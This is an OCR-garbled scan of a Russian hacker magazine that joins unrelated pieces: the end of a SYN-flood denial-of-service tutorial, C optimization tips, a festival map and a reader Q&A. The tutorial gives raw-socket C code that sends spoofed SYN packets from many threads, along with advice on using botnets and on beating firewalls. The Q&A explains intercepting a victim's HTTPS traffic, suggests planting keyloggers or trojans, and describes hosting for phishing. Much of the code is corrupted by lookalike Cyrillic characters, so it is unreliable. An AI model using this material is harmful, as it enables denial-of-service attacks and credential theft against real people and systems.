Легко! НАІ\ЮІ_Е на сырой сокет создается следующим вызовом: 

іі (ѴѴЗАЗіагІир(МАКЕѴѴОРіО(2,2), &\Л/ЗАЛаІа)!=0) 

{ 

ргіпІІ("ѴѴ5А5іагІир Еггог!\п"); 

} 



іІ((зкІ=ѴѴЗАЗоскеІ(АР_ІІ\ІЕТ, 50СК_НАѴѴ, ІРРНОТО_НАѴѴ, О, 
ѴѴЗА_РІАО_ОѴЕР1_АРРЕО))=-1МѴАІЮ_ЗОСКЕТ) 

{ 

ргіпІІ("5оскеІ Зеіир Еггог!\п"); 

} 



ТІа.д=1 ; 

іі (зеІзоскорІфкІ.ІРРВОТСНР, ІР_РЮРІІ\ІСІ_, 
(сНаг *)&Дад, зІ 2 еоІ(ІІад))==ЗОСКЕТ_ЕВВОР) 

{ 

ргіпІІ("зеІзоскорІ ІР_РЮРІІ\ІСІ_ еггог!\п"); 

} 



пТітеОѵег=ЮОО; 

іі (зеізоскоріфкі, 50І__50СКЕТ, 50_5І\ЮТІМЕ0, (сІпаг*)&пТітеОѵег, 
зІ 2 еоІ(пТітеОѵег))==ЗОСКЕТ_ЕРРОР) 

{ 

ргіпІІ("зеІзоскорІ 30_5І\ЮТІМЕ0 еггог!\п"); 

} 



После этого нужно вызвать нашу функцию по сборке фейк-пакета. Сде- 
лать это можно таким образом: 

сопз!гисІраскеІ(іпеІІгадтепІ, згсасісіг, сізіасісіг, сізірогі); 

После чего отправляем его на НОІІЗЕ :), а точнее — вот так: 

Тог(1=0; І<ТІ\І; І++)//Т7\І количество отправляемых раз 
{ 

Г Отправляем фейк-пакет на удаленную систему*/ 
гесІ=зепсІІо(зкІ, іпеіігадтепі, зігеоіфігисі ЬгО_ір)+зІ 2 еоІ(зІгисІ Ьг0_1ср), 

О, (зІгисІзоскасІсІг*)&асІсІг_іп, зІ 2 еоІ(асІсІг_іп)); 

ІІ (гесІ==ЗОСКЕТ_ЕРРОР) 

{ 

ргіпІІ("зепсІ еггог! :%сІ\п",ѴѴЗАОеіЦазІЕггог()); 

} 

еізе 

ргіпІІ("зепсІок!\п"); 

} 



В общем, весь описанный код желательно объединить в одну большую 
функцию (для чего — читаем ниже), обзовем ее ТИгеабЗупРІооб, и общий 
ее синтаксис будет следующий: 

ипзідпесі зісісаіі ТИгеасІ5упРІоосІ(ѵоісІ *агд) 

{ 

Г Здесь должен быть ваш «хлам» (эмуляция ІРѵ4 ЗУЫ-пакета, 
отправление его жертве). Все то, что мы разбирали выше. 7 

} 



А где же результат? 

Все это очень хорошо, но мы ни как не вписываемся в третий постулат, 
поскольку нет нагрузки на систему. Тут уже нас подстерегают некоторые 
трудности. Например, циклами тут не отделаться, поэтому стоит заду- 
маться о многопоточном программировании. Многопоточность на языке 
всех времен и народов можно организовать по-разному, но лично я ис- 
пользовал технологию трейдексов (для более глубокого изучения стоит 
посмотреть МЗОІМ). Итак, углубимся в следующий пример: 

Іог(ІпсоипІ=0; ІпсоипІ < ТЫ; ІпсоипІ ++) 

ЬТЬгеабз[ІпсоипІ] = (НАМОЦЕ)_ЬедіпібгеасІех(ШІ_І_, О, 



&ТН геасІЗу п РІоосІ , ІпіІРагат, 0, &иТЬгеасІЮз[ІпсоипІ]); 

ѴѴаіІРогМиІІІріеОЬіесІз(ТІ\І, ЬТбгеасІз, ТВІІЕ, ІЫРІЫІТЕ); 

Іог(ІпсоипІ=0; ІпсоипІ < ТЫ; ІпсоипІ ++) 

СІозеНапсІІе( ГіТГігеасІз[ІпсоипІ]); 

ЗІеер(ЗЦЕЕРТІМЕ); 

Здесь потоки создаются с помощью функции _ЬедіпіИгеабех, пос- 
ле чего стоит подождать завершения потоков с помощью функ- 
ции ѴѴаііРогМиІІірІеОЬіесІз, а закрываем их с помощью функции 
СІозеНапбІе. 

Поближе рассмотрим некоторые аргументы функции _ЬедіпіИгеасІех. 
Параметр &ТНгеасІ5уп РІоосІ — это адрес функции, которую мы уже оп- 
ределили выше; ІпіІРагат — указатель на буфер, в котором содержатся 
аргументы, передаваемые в функцию ТИгеабЗупРІоосІ; іЛТігеасІЮз — уни- 
кальный номер потока. Остальные аргументы функции _ЬедіпіИгеабех 
читаем в МЗОКІ. 

Функция _ЬедіпіИгеабех возвращает указатели на НАІ\ЮІ_Е в массив 
ИТИгеасІз[ТІ\І], где ТЫ — это номер потока. 

Объявляется это все примерно следующим образом: 

іпі ІпсоипІ; // Счетчик 

ЗТРІІЧО ІпіІРагат[3]; //Аргументы функции 
ипзідпесі иТГігеасІЮз[ТІ\І]; // Идентификатор потока 
НАІ\ЮІ_Е ПТГігеасІ5[ТІ\І]; // НАІ\ЮІ_Е потока 

В зависимости от параметра ТЫ мы сможем регулировать нагрузку на 
удаленную систему. Происходит все следующим образом: приходят па- 
кеты с запросом ЗѴІ\І от различных ІР-адресов, и на каждый адрес уда- 
ленная система должна ответить пакетом ЗѴІЧАСК, а это значит, что мы 
пришли в соответствие с третьим постулатом об уязвимости системы , и в 
гипотетической банке будет создаваться дополнительная нагрузка на ее 
ресурсы, параметрами которой будут являться время и память ;). 

На посошок! 

Помнится, в фильме «Хакеры», когда Джои копался в мусорном файле, 
тамошний администратор что-то говорил по поводу нагрузки на систему 
с тысячи машин (точное число не помню). Наверняка авторы фильма име- 
ли в виду именно такой тип атаки. 

Правда, в фильме было и вторжение, а зрооіесі ІІооб использовался как 
отвлекающий маневр. Это важно, ведь сетевой ІІооб не стоит расцени- 
вать как взлом, это только нанесение вреда системам ЭВМ, что также, 
как и взлом, строго карается законом (см. 272, 273, 274УКРФ). зс 



Интересные моменты 

1/ Многие системы коммутаторов, концентраторов и маршрутиза- 
торов от подобного напалма могут просто «наглотаться» сетевого 
«мусора», и цель не будет достигнута, поэтому важно помнить, что 
нужно осторожно работать с количеством потоков исходящего 
трафика. Опытные хакеры распределяют подобный трафик на не- 
сколько машин — из различных сегментов сети (про ЬоІ пеі напи- 
сано не так уж и мало). 

2 / Необходимо помнить, что ѴѴіпХР позволяет создавать не боль- 
ше 10-ти потоков от одного процесса, поэтому лучше использо- 
вать \л/2к. 

3/ Если на системе стоит программный файрвол, то он может 
просто не выдержать огромного беспорядочного натиска паке- 
тов. Известно, что при защите с помощью программного файрво- 
ла пакет в любом случае доберется до ядра ОС и будет им обра- 
ботан. Кроме того, не стоит забывать, что файрвол для обработки 
пакетов тоже использует системные ресурсы. 

4 / Современные файрволы уровня ядра умеют грамотно «от- 
шить» ЗѴІЧ-атаку. В таких случаях можно попробовать комбини- 
ровать ЗѴІМ-атаку на РІІ\І и ВЗТ (но особых результатов это может 
и не принести). Поэтому все же ІМике Іуре-атаки (ошибки Гейзен- 
берга в ОС и файрволах) по-прежнему будут оставаться актуаль- 
ными в сетевых войнах. 




Огромное спасибо сІг.КІоипіг'у ака Лозовский Алек- 
сандр, аВАОопп'у ака Елезаров Сергей и Кустову 
Михаилу. 
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КРИС КАСПЕРСКИ 



Сосііпд/ 




ПРОДОЛЖАЕМ ДЕЛИТЬСЯ ТРЮКАМИ И ХИТРОСТЯМИ ЭФФЕКТИВНОГО 
ПРОГРАММИРОВАНИЯ НА СИ! СЕГОДНЯ МЫ РАССМОТРИМ СТРОКИ, 
УКАЗАТЕЛИ, ЦИКЛЫ, ПАМЯТЬ И МНОГИЕ ДРУГИЕ АСПЕКТЫ ПРАКТИЧЕСКОГО 
ПРОГРАММИРОВАНИЯ. 




Борьба с инвариантами 

Самой распространенной ошиб- 
кой, снижающей производитель- 
ность, является присутствие функ- 
ций-инвариантов в теле цикла. Вот 
классический пример: 



Ьг (а = 0, х = 0; а < зігіеп(з); а++) 



х += в [а]; 

} 



С точки зрения программиста, очевидно, что функция зігіеп не моди- 
фицирует строку з, а поэтому может быть вычислена лишь однажды. 
Только вот компилирующий этого не знает, придерживаясь принципа: 
все, что может быть передано по ссылке, может быть изменено, поэ- 
тому зігіеп(з) заново вычисляется на каждой итерации цикла, что при 
длинных строках снижает производительность на порядок! 
Исправленный вариант выглядит так: 

п = зігіеп(з); 



При работе с относительно короткими 
строками замена зігіеп(з) на зігсГіг(з 
0) может дать до 5-7% ускорения, а 
вот замена нескольких зігсаі'ов на 
последовательность вызовов нестан 
дартной функцией зірсру (которая 
тем не менее, присутствует во всех 
современных компиляторах) значи 
тельно выигрывает! 



Ьг (а = 0, х = 0; а < п; а++) 
{ 

х += з [а]; 

} 






Наиболее эффективно обрабаты- 
ваются строки, начинающиеся с 
адреса, кратного четырем. Имен- 
но так компилятор размещает их в 
стеке и статической памяти. Отсю- 
да функция зігіеп(з) выполняется 
эффективно, а вот зІгІеп(з-И) — не 
очень. То же самое относится и ко всем остальным функциям. Поэтому 
всегда стремись выравнивать строки, когда это только возможно. Ска- 
жем, «з1гсру(з, «Ьуіез »); зІгсаІ(з, ѵегу_Іопд_зІгіпд);» выполняется неэ- 
ффективно, но если переписать код так: «з1гсру(з, «Ьуіез: »); зІгсаІ(з, 
ѵегу_Іопд_зІгіпд);», то скорость его выполнения значительно возрастет 
за счет того, что адрес конца строки з станет кратен 4-м байтам. 








Указатели 

Компиляторы стремятся разме- 
щать переменные в регистрах, из- 
бегая «дорогостоящих» операций 
обращения к памяти, однако не 
всегда это у них получается, осо- 
бенно при работе с указателями, 
поскольку в общем случае компи- 
лятор не может быть уверен, что 
два различных указателя не адре- 
суют одну и ту же ячейку памяти. 
Вот, например: 



\і (сГіаг *х, іпі *(М, іпі п) 

{ 

іпі і; !ог (і = 0; і < п; І++) 
*сізі += х[і]; 

} 



Компилятор не может поместить переменную бзі в регистр, поскольку, 
если ячейки *х и *бзі частично или полностью перекрываются, моди- 
фикация ячейки *бз! приводит к неожиданному изменению *х! Бред, 
конечно, но Стандарт не запрещает таких трюков, а оптимизатор не 
имеет права отступать от Стандарта, поэтому обращения к памяти про- 
исходят на каждой итерации, а это весьма «дорогостоящая», в плане 
процессорных тактов, операция! 
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Переписанный код выглядит так: 

іі (сііаг *х, іпі *сізі, іпі п) 

{ 

іпі і,І =0; 

// сохранение суммы во временной переменной 
Іог (і=0;і<п;і++) 
і+=х[і]; 

*сІ5І+=І; // запись конечного результата в память 



Неудачный выбор при- 
оритетов в Си 

Вопреки здравому смыслу конс- 
трукция типа *р[а]++ увеличивает 
отнюдь не содержимое ячейки, 
на которую указывает *(р+а), а 
значение самого указателя р! 
Для достижения ожидаемого ре- 
зультата необходимо либо явно 
навязать наше намерение ком- 
пилятору путем расстановки ско- 
бок: «(*р)[а]++;», либо же вовсе 
отказаться от оператора «++», 
заменив его оператором «+=», и 
тогда наш код будет выглядеть 
так: «*р[а]+ = 1;». 

Представляется интересным докопаться до сути происходящего, ведь 
основное кредо Си — краткость. Чего стоит один неявный іпі, который 
попил много крови разработчикам компиляторов. И тут... вдруг сталки- 
ваешься с таким расточительством! Ведь чтобы использовать надо 
ставить скобки, а это — целых два нажатия на клаву. Зачем? Может 
быть, есть такие ситуации, где именно такой расклад приоритетов дает 
выигрыш? О чем вообще думали в этот момент разработчики языка? В 
доступных мне книжках никаких вразумительных объяснений ситуации 
я так и не нашел. 

Прозрение наступило внезапно, и причина, как выяснилось, оказалась 
даже не в самом языке, а в особенностях косвенной автоинкремен- 
тной/автодекрементной адресации процессора РЭР-11, из которого, 
собственно, и вырос Си. Команда типа «МОѴ @(р)+, ххх» пересылает 
содержимое **р в ххх и затем увеличивает значение р. Да! Именно р, а 
отнюдь не ячейки, на которую **р ссылается!!! 

Так стоит ли удивляться тому, что люди, воспитанные на идеологии 
РОР-11, перенесли ее поведение и на разрабатываемый ими язык? И, 
кстати, о птичках. Система адресации РОР-11 намного мощнее, удоб- 
ней и элегантнее того уродства, что реализовано в х86... 

Хочешь испытать свой компилятор? Нет проблем! Вот довольно позна- 
вательный листинг: 

таіп() 

{ 

сИаг ЬиТ; сГіаг* р_ЬиІ[2]; сИаг **р; 

#сІеІіпе ІМТ ЬиІ=0х66; *р_ЬиІ=&ЬиІ; 

*(р_ЬиІ+1)=&ЬиІ; р=&р_ЬиІ; 

ІМТ; 

ргіпІІ("сІпаг **р;\п"); 

ргіпІІ("р = %р; *р = %р; **р = %х\п\п",р, *р, **р); 

*Р[0]++; 

рппІІ( И *р[0]++;\п''); 

ргіпІІ("р = %р; *р = %р; **р = %х\п",р, *р, **р); 
ргіпІІ("смотрите, увеличилось не содержимое **р,\п"); 
ргіпІІ("а указатель, на который ссылается *р!\п"); 
ргіпЩ'То есть мы получили совсем не то, что хотели !\п\п"); 



ІМТ; 

(*Р)[0]++; 

ргіпЩ"(*р)[0]++;\п"); 

ргіпІІ("р = %р; *р = %р; **р = %х;\п",р, *р, **р); 
ргіпІІ("хорошо, заключаем *р в скобки, тем самым явноѴГ); 
ргіпІІ("навязывая компилятору последовательность действийѴіѴГ); 

ІМТ; 

*р[0]+=1 ; 

ргіп1І("*р[0]+=1;\п"); 

ргіпІІ("р = %р; *р = %р; **р = %х;\п",р, *р, **р); 
ргіпІІ("забавно, но замена оператора ++ на оператор +=\п"); 
ргіпІІ("эту проблему как рукой снимаетІѴі"); 



Для преодоления катастрофической нехватки регистров некоторые 
компиляторы стремятся совмещать счетчик цикла с указателем на об- 
рабатываемые данные. Код вида «Іог (і = 0; і < п; і++) п+=а[і];» транс- 
формируется оптимизатором в «Іог (р= а; р < &а[п]; р++) п+=*р;». Эко- 
номия налицо! Вместо четырех переменных после преобразования 
осталось всего лишь три! 

Впервые (насколько мне известно) эта техника использовалась в ком- 
пиляторах фирмы НеѵѵІеІІ-РаскагсІ, где она фигурировала под терми- 
ном гедізіег геаззосіаііоп. А что же конкуренты?! Возьмем следующий 
код (кстати, выдранный из документации на НР-компилятор): 

іпі а[10][20][30]; 
ѵоіб ехатріе (ѵоісі) 

{ 

іпі і, І, к; 

Іог (к = 0; к < 10; к++) 

Іог (і = 0; \ < 10;і++) 

Іог (і = 0; і < 10; і++) 
а[і][]][к] = 1; 

} 

Г рамотный оптимизатор должен переписать его так: 

іпі а[10][20][30]; 
ѵоіб ехатріе (ѵоісі) 

{ 

іпі і, і, к; 

гедізіег іпі (*р)[20][30]; 

Іог (к = 0; к < 10; к++) 

Іог (і = 0; \ < 10; і++) 

Іог (р = (іпі (*)[20][30]) &а[0][і][к], і = 0; і < 10; І++) 

*(Р++[0][0]) = 1 ; 

} 

Эксперимент показывает, что ни МісгозоІІ ѴізиаІ С++, ни ѲСС не вы- 
полняют регистровых реассоциаций ни в сложных, ни даже в простей- 
ших случаях. С приведенным примером справился один лишь ІпІеІ С++, 
да и то лишь частично, поэтому в критических к производительности 
случаях оптимизировать код необходимо вручную, з: 
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2-ориентация 



Если ты держишь журнал в руках, и сейчас двадцатые числа 
июля, то знай - в Крыму недалеко от Евпарории прямо сейчас 
набирает обороты самый масштабный орепаіг этого лета: Ка2ан 
тип'06. Тусовка продлится еще больше месяца, так что у тебя 
есть целая куча времени, чтобы собрать пару маек и отправится 
колбаситься. Специально для тебя мы сделали карту, которая 
поможет тебе не потерять ориентацию. 
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Охрененно глючные ветряки. До них можно дой- 
ти даже пешком - и там очень круто 



Евпатории — > 




Рядом находятся лечебные грязи. 
Можно вымазаться и отправиться 






Исследовательская космическая 
станция. Огромные радиотелес- 
копы смотрят в космос и собирают 
инфу для ученых. Единственная в 
Европе. Охраняется 










сзО 




Писать лучше всего через этот 
забор - если поссать на территории 
Казантипа, наложат штраф 



00. Главный танцпол 
01 .Триумфальная арка| 

02. Казантипская башня 

03. Танцпол ІЫЗЮЕ 

04. Пирамида 

05. Летающая Тарелка 



06. Кайт-станция 

07. Стоунхендж 

08. Бар Море по колено 

09. Ресторан Разіа Ргоіесі] 

10. ЫеОгапде 

1 1 . Камасутра 



12. БарЕиго 

1 3. Татары готовят плов 

14. Крутой песочный пляж 

15. Романтичный бар 

16. БарВгееге 

17. БарѲОАІ 



18. 

19. 

20. 


Бар Оогад 
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Камасутра-центр 

Можно даже сказать, что это самое злачное место в рес- 
публике. 

Буквально, гнездо разврата, причем очень уютное и эсте- 
тичное гнездо. Эротический чиллаут-бар, состоящий из 
маленьких уютных кабинок и бунгало с видом на море, и 
учебными пособиями из Камасутры на стенах, где за умерен- 
ную почасовую плату могут уединяться парочки или просто 
отсыпаться те, кому лень идти домой. Это беспрецедентной 
дерзости заведение, вот уже четвертый год являющее- 
ся гнездом порока и разврата, работает под прикрытием 
Правительственной программы, якобы занятой легализа- 
цией и эстетизацией случайных и закономерных сексуаль- 
ных связей великого сексуального казантипского народа. 
Наглое вранье. 

Башни Раз* МаггіесІ 

Очень злачное место. Оно могло бы быть еще более злач- 
ным, если бы не все та же правительственная программа по 
упорядочиванию случайных связей — Раз! МаггіесІ. 

Раз! МаггіесІ — это публичная церемония заключения любов- 
ных союзов по-быстренькому, будто бы ужасно романтичная: 
на закате солнца парочка, желающая узаконить свои легко- 
мысленные отношения союзом РІА НЕБЕСАХ, одевается как 
можно экстравагантнее и порознь карабкается на две 15- 
метровые Девочковую и Мальчуковую башни Раз! МаггіесІ, 
таким образом демонстрируя возвышенность чувств. Там, 
наверху, в лучах заходящего солнца, и при свидетельстве 
НЕБА, они дают друг другу какие угодно обещания и призна- 
ются в любви. 

Процедура, конечно же, абсолютно аморальная: женится 
может кто угодно и на ком угодно при обоюдном согласии, 
количество РМ-союзов не лимитировано — бумаги в стране 
много, для заключения последующего союза расторжения 
предыдущего не требуется, свидетельство РМ действует 
ровно столько, сколько длится любовь, после чего становит- 
ся просто сувениром. Ну разве не цинично, не аморально? 
Никакой тебе проверки чувств, сплошная спонтанность и 
романтичная якобы неслучайность связей. 



феру сродни казино. И натанцевавшиеся вне времени и общей суеты 
люди, выбравшись на белый свет, вполне смогут обнаружить, что 
наступила осень, и все давно разъехались. Вот так вот затягивает. 

§Ніі-РаІасе 

Как следует из названия, это заведение, несмотря на его архитек- 
турный пафос, вполне можно считать злачной и грязной клоакой и 
олицетворением всего самого, извините, дерьмового и низменного в 
великом казантипском народе. Это единственный в мире публичный 
туалетно-развлекательный комплекс на 20 посадочных, 4 помывоч- 
ных и 1000 танцевальных мест, оснащенный по последнему слову 
сантехники. По официальной версии, проект был создан с целью 
повышения культуры и без того высококультурного казантипского 
населения, которое даже писает под музыку и может скоротать время 
стояния в очереди на танцполе. Но мы-то знаем, как все на самом 
деле происходит! 

Стоунхендж 

Сакральная территория. Носит также названия Столбхендж и Храм 
Конвергенции. 

Представляет собой идеально круглую площадку в обрамлении 12-ти 
вертикальных столбов. Это республиканские солнечные часы, кото- 
рые всегда показывают самое точное республиканское время, то 
есть отсутствие времени, вечное Здесь-и-Сейчастье, и самое-время- 
для-чудес. Это своего рода сердце Республики, которое, как все 
сакральные и священные места, наиболее подвержено осквернению. 
Это место славится своей злачностью: туристов неизбежно тянет 
пошло сфотографироваться именно в Стоунхендже, храмовые колон- 
ны давно исписаны безвкусным граффити, местные авторитеты норо- 
вят учинить там свои мелкие разборки и поприставать к безобидным 
фрикам, а аборигены днем и ночью оскверняют храм мелко-лоточной 
торговлей, выкрикивая: «Пахлава! Горячая кукуруза!». Тьфу. 

Восточная и Западная границы республики 

Чрезвычайно злачные места, привлекательные для нелегалов, норовя- 
щих перелезть-перепрыгнуть-переплыть через великий казантипский 
забор, а еще для находчивых Писунов, которые, чтобы избежать 
уголовного преследования за писанье в неположенном месте, писают 
через забор в сопредельное государство. 



Дети подземелья 

Это танцевально-интернетный комплекс на первом уровне 
Великой казантипской башни, состоящий из закрытого 
танцпола и интернет-кафе, Несмотря на всю возвышенность 
строения, «Дети подземелья» будет очень злачным местом! 
В самом центре Республики, посреди бела дня, в темном и 
сыром андеграунде, скрытая от посторонних глаз порочная 
публика сможет предаваться развлечениям современности 
— танцам до упаду и интернету. Закрытость постройки, при- 
глушенный свет и отсутствие времени создают тут атмос- 



Визовый отдел 

Считается ужасно злачным местом, которого не удалось избежать 
никому. Ежедневно и еженощно тысячи эмигрантов, туристов, бежен- 
цев и представителей творческой интеллигенции из различных стран 
мира обивают порог визового отдела республики. В каком-то смысле, 
это самое тусовочное место, где царит атмосфера фестивалей хиппи 
70-х. Здесь панки, хиппи, рэйверы и приличные граждане всех мастей 
и социальных статусов выпивают, курят, матерятся на очередь, руга- 
ются с таможенниками, сидят на редкой травке, играют на гитарках и 
веселятся в предвкушении всего самого интересного. Очень необыч- 
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СТЕПАН ИЛЬИН АКА ЗТЕР 




*аа@геаІ .хакер, ги 



О: Подскажи, каким образом 
можно замаскировать исполь- 
зование скрипта на сервере. 
Для меня это очень актуаль- 
но: нужно, чтобы клиенты, 

как и прежде, обращались к 
нему, но при этом не догады- 
вались, что имеют дело не с 
динамической структурой, а 
статической страницей. 

А: Верный ход в твоем случае — восполь- 
зоваться возможностями файла .Иіассезз и 
модулем МосІ Веѵѵгііе. К счастью, последний 
установлен практически на любом хостин- 
ге, даже самом дешевом. Допустим, что 
скрипту передаются два параметра: первый 
задает тип авторизации, а второй — число- 
вой идентификатор пользователя. ІІПЬадрес 
такой страницы будет примерно следующим: 
ѵѵѵѵѵѵ.зі1е.сот/Іодіп.рІ?^ре=раззѵѵогб&ісІ=3133 
7. Чтобы спрятать вызов скрипта, достаточно 
добавить в .Піассезз 2 следующие строчки: 



ВеѵѵгііеЕпдіпе Оп 

ВеѵѵгіІеВиІе л ([а-гА-2]+)/ ([0-9]+).ІіІтІ Іодіп. 
рІ?Іуре=$1;ісІ=$2 



Готово. Страница легко отзовется по адре- 
су: ѵѵѵѵѵѵ.зИе.сот/раззѵѵогсІ/31337.ІіітІ . Теперь 
комментарии по коду. Первая строчка вклю- 
чает механизм переписывания ІІВІ_ (под- 
рубает модуль МосІ Веѵѵгііе). Вторая более 
сложная: сначала с помощью регулярного 
выражения она бьет адрес на 2 составляю- 
щие (в переменную $1 записывается часть 
адреса до слеша «/», а в переменную $2 



заносится номер, стоящий до .ПІтІ), после 
чего преобразует ІІВІ_ в нужный нам вид. 
Просто внимательно посмотри на нее — и 
все станет ясно. 

Единственная сложность заключается в том, 
чтобы постоянно отслеживать II НІ_. Если об 
этом не позаботиться, то настоящий II ВІ_ обя- 
зательно засветится во время перехода, осу- 
ществляемого самим скриптом. Сложность, 
впрочем, легко разрешима: нужно лишь 
написать простую функцию для преобразо- 
вания ІІВІ_ и использовать ее для любой 
навигации по сайту. 

Вообще, интересная штука этот МосІ Веѵѵгііе. 
Можно молниеносно огородить себя от скрип- 
ткидисов и любителей искать уязвимые сце- 
нарии через Ооодіе. Едва ли кому-то придет в 
голову заморачиваться со статическим ІІВІ_ и 
тем более пытаться завалить сайт с помощью 
дежурных подстановок — ‘1, ІісІІ и т.д. 

Но даже если кто-то и решится, то ничего у 
него не выйдет. 

О: Нужно срочно отправить 
факс в США, а факсимиль- 
ного аппарата под рукой нет. 
Это можно сделать через 
инет? 

А: Тебе поможет онлайн-сервис ѵѵѵѵѵѵ.еіах. 
сот . Отправка и прием факсов осуществля- 
ется с помощью специальной программы. 
Всего на сайте доступно три ее вариации: 
начиная от самой простой, которая умеет 
только принимать сообщения, но зато бес- 
платно, и заканчивая профессиональной вер- 
сией, предоставляющей удобный интерфейс 



для составления факса и отправки его в 
любой уголок планеты. Жаль только, что пла- 
тить за такой сервис придется ежемесячно. 

О: Как отследить вызовы 

ядра в операционной системе 
на базе ѴѴіпсІоѵѵз? Хочу таким 
образом изучить работу одно- 
го интересного приложения. 
А: Крис Касперски обязательно посоветовал 
бы тебе дизассемблировать код. Так ты и 
вызовы отследишь, и в общем алгоритме 
программы разберешься. Но если квалифи- 
кации не хватает, то вполне сойдет утилита 
ГѵІіЗру ( ПНр://стр.рПѵз.тзи.зи/пК:ІиЫ . Прога 
представляет собой комбинацию драйвера 
и интерфейсной программы, позволяющую 
выудить информацию о любых системных 
вызовах. Для каждого выводится имя про- 
цесса, вызвавшего функцию, время вызова, 
имя функции и многое другое. ІЧіЗру также 
позволяет наложить фильтр по процессам, 
что для тебя особенно актуально. 

О: Как писать кроссплатфор- 
менные приложения? 

А: А как взломать ІІпіх? Четких рецептов, 
естественно, нет, но есть общие рекоменда- 
ции. Самый главный принцип — четкое раз- 
деление движка программы и ее интерфейса 
(во время проектирования и разработки при- 
ложения). Рассмотрим в качестве примера 
популярный ѴѴеЬ-сервер АрасИе. Как извес- 
тно, демон реализован на базе всевозмож- 
ных платформ, в том числе ІІпіх и ѴѴіпсІоѵѵз. 
Мощным ходом со стороны разработчиков 
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стала многомодульность этого приложения. 
Каждый отдельный компонент, отвечающий 
за ту или иную функцию, написан с исполь- 
зованием внутреннего языка АрасПе и никак 
не затрагивает системных вызовов операци- 
онной системы. Таким образом, получает- 
ся идеальная модель приложения, которую 
можно портировать на любую систему, пере- 
писав лишь часть, отвечающую за работу 
с сетевыми интерфейсами и операционной 
системой. В то же время все функциональ- 
ные элементы остаются неизменными. 

Чтобы в будущем облегчить портирование 
программы на другую платформу, не ленись 
брать на вооружение стандарты. Избегай 
использования фишек, актуальных только 
для одной конкретной платформы. В буду- 
щем это позволит тебе сэкономить массу 
времени и нервов. 

О: Есть ли хоть какая-нибудь 
возможность перехватить 
НТТРЗ-трафик пользовате- 
ля? По идеи, технология 351- 
пол ностью исключает такую 
зможность . 

А: Начать стоит с того, что ЗЗІ_ может 

использоваться по-разному. В идеале как 
клиент, так и сервер должен иметь свой 
собственный сертификат — в этом случае 
достигается максимум безопасности. Но 
такой подход я встречал только на хакерс- 
ких форумах, в то время как обычные сайты 
и даже банковские биллинги обходят его 
стороной. Если сертификаты используются 
только серверной стороной, то перехватить 
данные теоретически возможно, но с учетом 
нескольких условий. 

Во-первых, тебе придется настроить поль- 
зовательское подключение так, чтобы весь 
НТТР-трафик шел через твою заранее заго- 
товленную прокси, а для этого нужен доступ к 
компьютеру жертвы. Во-вторых, пользователь 
не должен обратить внимание (вероятнее 
всего, не обратит) на предупреждения браузе- 
ра о том, что полученные детали ЗЗІ_ не сов- 
падают с сертификатом сервера (сертификат 
прокси, естественно, будет отличаться от 
сертификата сервера). Все остальное — дело 
техники или, вернее, специального софта. Я 
знаю два НТТРЗ прокси-сервера, позволяю- 
щих перехватывать и модифицировать про- 
ходящие через них данные. Это — Вигр ргоху 
( Пир://рогІ5ѵѵіддег.пеІ/ргохѵЛ и АсПіІІез ( ѵѵѵѵѵѵ. 
таѵепзесипіѵ.сот/асЫІІез ). Особенно хорош 
Вигр ргоху. Благодаря продвинутому поиску 
и поддержке регулярных выражений найти 
нужную инфу среди массы перехваченных 
данных будет проще простого. Более того, 
любые параметры и значения форм, пере- 
даваемые серверу, легко модифицируются 
с помощью интерактивного инструмента, а 
другие данные при необходимости можно 
поправить с помощью шестнадцатеричного 
редактора. Если прокси-перехватчик уста- 
новлен на удаленном компьютере, то очень 



кстати будет и веб-интерфейс софтины, отоб- 
ражающий логи программы. 

С другой стороны, если тебе удастся поме- 
нять настройки пользовательского соедине- 
ния, то что мешает тебе установить у него 
кейлоггер или троян, которые будет собирать 
данные с форм? ЗЗЬсоединение защищает 
только на участке клиент-сервер и от подоб- 
ной напасти не спасет точно. 

О: Говорят, что из старого 

ЖК-монитора и простого про- 
екционного аппарата можно 
сделать неплохой проектор. 
Это правда? 

А: По крайней мере, ребятам из команды 
Тот’з Нагсіѵѵаге ( ѵѵѵѵѵѵЛІід.ги ) это удалось. 
Принцип построения очень прост: из старо- 
го монитора, возможно с умершей лампой 
(такие продаются очень дешево), извлека- 
ется ЖК-матрица и вся электроника, после 
чего монтируются на проекционный аппарат, 
предназначенный для работы со слайдами 
формата А4 (прозрачные листики). Картинка 
на монитор подается обычным образом с ком- 
пьютера, и на ЖК-матрице появляется изоб- 
ражение. Далее, посредством мощной лампы 
проектора, изображение попадает на линзы 
и с их помощью проецируется на большой 
экран. Вот и вся инструкция. Единственной 
проблемой является сильное нагревания 
ЖК-матрицы, которая решается установкой 
дополнительных вентиляторов. Подробные 
инструкции, рекомендации по выбору старого 
монитора и проекционного аппарата, а также 
видео сборки подобного агрегата ты найдешь 
на вышеупомянутом сайте. Замечу, что сто- 
имость постройки девайса составляет $200- 
300, что несравнимо дешевле современных 
проекторов. 

О: Как хакеры размещают 

свои скрипты и страницы для 
фишинга, спама-ботов, ѴРІМ- 
серверов, хранения логов 
и т.д.? Ведь администрация 
должна быстро палить их и 
закрывать аккаунты... 

А: Естественно, не обходится без своих 

людей в администрации или суппорте хостин- 
га. Хостинг для подобных проектов стоит на 
порядок выше, чем аренда обычного выде- 
ленного сервера. И предоставляет его чело- 
век, который либо сам работает в дата-цент- 
ре, либо имеет там очень хороших знакомых. 
Благодаря этому он может фильтровать абузы 
(письма администрации хостинга о незакон- 
ной деятельности поддерживаемых проектов) 
или вообще не реагировать на них. Цена 
аренды сервера зависит от проблемности 
проекта. Чтобы заранее проверить выполне- 
ние обязательств сервиса, надо самому напи- 
сать несколько жалоб администрации дата- 
центра. Если хостинг приостановят — значит, 
сервис фигня, и нужно искать альтернативу. 
Если выдержит — смело работай. 



О: Что такое Адепі Гогѵѵагсііпд 
в плане 55Н? 

А: Под таким хитрым названием скры- 
вается технология быстрой аутентифика- 
ции пользователя по цепочке на несколь- 
ких машинах. Адепі Рогѵѵагсііпд позволяет 
избегать повторного введения пароля при 
доступе к нескольким ЗЗН-серверам. Кроме 
того, эта технология позволяет избежать 
утечки приватного ключа клиента (ргіѵаіе 
кеу), так как его копия будет храниться 
только на клиентской машине. Удобным 
дополнением этой технологии может стать 
утилита Сіизіег ЗЗН ( сіизіегззіі.зоигсеіогде. 
пеі ). позволяющая одновременно открывать 
несколько ЗЗН-соединений и управлять ими 
с помощью единственной консоли. Любая 
команда, набранная в этой консоли, реп- 
лицируется, то есть передается по всем 
ЗЗН-соединениям, что избавляет тебя от 
повторения монотонной работы. 

О; Как победить широкове- 
щательный трафик в сети? 
Подскажи, пожалуйста. 

